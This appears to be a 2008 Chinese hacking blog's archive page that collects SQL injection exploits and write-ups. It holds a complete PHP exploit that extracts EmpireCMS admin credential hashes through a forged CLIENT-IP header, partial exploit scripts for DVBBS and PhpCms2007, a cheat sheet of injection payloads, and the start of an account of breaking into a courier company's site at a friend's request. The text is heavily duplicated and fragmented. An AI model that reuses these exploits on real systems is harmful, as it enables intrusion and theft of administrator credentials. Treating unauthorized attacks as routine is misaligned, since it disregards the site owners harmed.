Dvbbs·php Version 2.0++ Blind SQL Injection
作者:coolgo 日期:2008/10/01
<html>
<head>
<title>Dvbbs·php Version 2.0++ Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
----------------------------------------------------------------------------------------------
- DVBBS PHP 2.0 Forum Blind SQL Injection Exploit -
- Info ---------------------------------------------------------------------------------------
- Author: oldjun -----------------------------------------------------------------------------
- Exploit Coded By T00LS.NET -------------------------------------------------------------
- Site: http://www.t00ls.net ----------------------------------------------------------------
----------------------------------------------------------------------------------------------
*/
function myrefresh()
{
window.location.reload();
}
function makewhat(x){
var whereto=new Array(2)//新建一个数组,项数为第一个下拉列表的项数
for(i=0;i<2;i++)//循环第一个下拉列表的项数那么多次
whereto[i]=new Array();//子循环
//下面是给每个循环赋值
whereto[0][0]=new Option("后台密码","0");
whereto[0][1]=new Option("后台用户名","1");
whereto[0][2]=new Option("关联前台用户名","2");
whereto[1][0]=new Option("前台密码","3");
whereto[1][1]=new Option("前台用户名","4");
<head>
<title>Dvbbs·php Version 2.0++ Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
----------------------------------------------------------------------------------------------
- DVBBS PHP 2.0 Forum Blind SQL Injection Exploit -
- Info ---------------------------------------------------------------------------------------
- Author: oldjun -----------------------------------------------------------------------------
- Exploit Coded By T00LS.NET -------------------------------------------------------------
- Site: http://www.t00ls.net ----------------------------------------------------------------
----------------------------------------------------------------------------------------------
*/
function myrefresh()
{
window.location.reload();
}
function makewhat(x){
var whereto=new Array(2)//新建一个数组,项数为第一个下拉列表的项数
for(i=0;i<2;i++)//循环第一个下拉列表的项数那么多次
whereto[i]=new Array();//子循环
//下面是给每个循环赋值
whereto[0][0]=new Option("后台密码","0");
whereto[0][1]=new Option("后台用户名","1");
whereto[0][2]=new Option("关联前台用户名","2");
whereto[1][0]=new Option("前台密码","3");
whereto[1][1]=new Option("前台用户名","4");
PhpCms2007 sp6 SQL injection 0day
作者:coolgo 日期:2008/10/01
<?
print_r('
--------------------------------------------------------------------------------
PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit
BY T00ls(www.T00ls.net)
--------------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
print_r('
--------------------------------------------------------------------------------
PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit
BY T00ls(www.T00ls.net)
--------------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
帝国4.7注入0day
作者:coolgo 日期:2008/10/01
<?php
print_r("
+------------------------------------------------------------------+
Exploit For EmpireCMS47
Just work as php>=5&mysql>=4.1
BY t00ls.net
+------------------------------------------------------------------+
");
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path \n";
echo "host: target server \n";
echo "path: path to EmpireCMS47\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /\n";
die;
}
$host=$argv[1];
$path=$argv[2];
$data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";
$cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where
userid=1),'',1,'1111',0,0,'')/*";
$message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n";
$message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: $cmd\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($data)."\r\n";
$message .= "Cookie: ecmsgbookbid=1;\r\n";
$message .= "Connection: Close\r\n";
$message .= "\r\n";
$message .=$data;
$ock=fsockopen($host,80);
if (!$ock) {
echo 'No response from '.$host;
die;
}
echo "[+]connected to the site!\r\n";
echo "[+]sending data now……\r\n";
fputs($ock,$message);
@$resp ='';
while ($ock && !feof($ock))
$resp .= fread($ock, 1024);
echo $resp;
echo "[+]done!\r\n";
echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash,good luck"
?>
print_r("
+------------------------------------------------------------------+
Exploit For EmpireCMS47
Just work as php>=5&mysql>=4.1
BY t00ls.net
+------------------------------------------------------------------+
");
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path \n";
echo "host: target server \n";
echo "path: path to EmpireCMS47\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /\n";
die;
}
$host=$argv[1];
$path=$argv[2];
$data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";
$cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where
userid=1),'',1,'1111',0,0,'')/*";
$message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n";
$message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: $cmd\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($data)."\r\n";
$message .= "Cookie: ecmsgbookbid=1;\r\n";
$message .= "Connection: Close\r\n";
$message .= "\r\n";
$message .=$data;
$ock=fsockopen($host,80);
if (!$ock) {
echo 'No response from '.$host;
die;
}
echo "[+]connected to the site!\r\n";
echo "[+]sending data now……\r\n";
fputs($ock,$message);
@$resp ='';
while ($ock && !feof($ock))
$resp .= fread($ock, 1024);
echo $resp;
echo "[+]done!\r\n";
echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash,good luck"
?>
全新的注入点检测方法
作者:coolgo 日期:2008/09/26
全新的注入点检测方法
古木系统安全 原创,转载请保留此处: http://gzkb.goomoo.cn
2008/9/25 -----------------------------------------------
现在有很多防注入程序屏蔽了 and、1=1、1=2 类似这样的关键字,使用这样的方法有时不能探测到注入点了。
那么是否有新的方法能够探测注入点呢? 经过一段时间的研究,发现了更好的方法。哈哈,特此共享一下。
古木系统安全 原创,转载请保留此处: http://gzkb.goomoo.cn
2008/9/25 -----------------------------------------------
现在有很多防注入程序屏蔽了 and、1=1、1=2 类似这样的关键字,使用这样的方法有时不能探测到注入点了。
那么是否有新的方法能够探测注入点呢? 经过一段时间的研究,发现了更好的方法。哈哈,特此共享一下。
风讯注入漏洞0802_[setnextoptions.asp]
作者:coolgo 日期:2008/07/02
By:Xiao.K
Site: Blog.sadk.org
Date:08.02.14
涉及版本:4.0 sp5
分析如下:
———————————————–User/setnextoptions.asp——————————————-
‘注意ReqSql
response.Charset=”gb2312″
SelectName = NoSqlHack(trim(request(”SelectName”)))
ReqSql = trim(request(”ReqSql”))
EquValue = NoSqlHack(trim(request(”EquValue”)))
sType = trim(request(”sType”))
if not isnumeric(sType) then sType = 1
if SelectName = “” then SelectName = “NoName_Sys” ‘看看你是否为空
if instr(lcase(ReqSql),”select “)=0 then
response.Write(”系统错误,请联系管理员。”)
response.End()
————————————
LCase 函数
返回字符串的小写形式
————————————–
InStr 函数
返回某字符串在另一字符串中第一次出现的位置。
InStr([start, ]string1, string2[, compare])
参数
start
可选项。数值表达式,用于设置每次搜索的开始位置。如果省略,将从第一个字符的位置开始搜索。如果 start 包含 Null,则会出现错误。如果已指定 compare,则必须要有 start 参数。
string1
必选项。接受搜索的字符串表达式。
string2
必选项。要搜索的字符串表达式。
Site: Blog.sadk.org
Date:08.02.14
涉及版本:4.0 sp5
分析如下:
———————————————–User/setnextoptions.asp——————————————-
‘注意ReqSql
response.Charset=”gb2312″
SelectName = NoSqlHack(trim(request(”SelectName”)))
ReqSql = trim(request(”ReqSql”))
EquValue = NoSqlHack(trim(request(”EquValue”)))
sType = trim(request(”sType”))
if not isnumeric(sType) then sType = 1
if SelectName = “” then SelectName = “NoName_Sys” ‘看看你是否为空
if instr(lcase(ReqSql),”select “)=0 then
response.Write(”系统错误,请联系管理员。”)
response.End()
————————————
LCase 函数
返回字符串的小写形式
————————————–
InStr 函数
返回某字符串在另一字符串中第一次出现的位置。
InStr([start, ]string1, string2[, compare])
参数
start
可选项。数值表达式,用于设置每次搜索的开始位置。如果省略,将从第一个字符的位置开始搜索。如果 start 包含 Null,则会出现错误。如果已指定 compare,则必须要有 start 参数。
string1
必选项。接受搜索的字符串表达式。
string2
必选项。要搜索的字符串表达式。
手动注入脚本命令详解
作者:coolgo 日期:2008/06/30
1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是mssql ;and user>0
3.注入参数是字符’and [查询条件] and ’’=’
4.搜索时没过滤参数的’and [查询条件] and ’%25’=’
5.判断数据库系统
2.初步判断是否是mssql ;and user>0
3.注入参数是字符’and [查询条件] and ’’=’
4.搜索时没过滤参数的’and [查询条件] and ’%25’=’
5.判断数据库系统
对著名快递公司的一次艰难的oracle注入
作者:coolgo 日期:2008/06/19
文章作者:rebeyond
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
● 轻车熟路
一个对新飞鸿有意见的亲密朋友找我说能不能把这个公司的网站给搞了,我一听公司,心想,企业站都是垃圾,好搞,便痛快答应(人品真好!),呵呵,但是后来才发现没我想像的那么简单。
站面如图
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
● 轻车熟路
一个对新飞鸿有意见的亲密朋友找我说能不能把这个公司的网站给搞了,我一听公司,心想,企业站都是垃圾,好搞,便痛快答应(人品真好!),呵呵,但是后来才发现没我想像的那么简单。
站面如图
Dvbbs8.1 0DAY(通杀Access和mssql版本)
作者:coolgo 日期:2008/01/09
动网不愧为"洞网",又出漏洞了
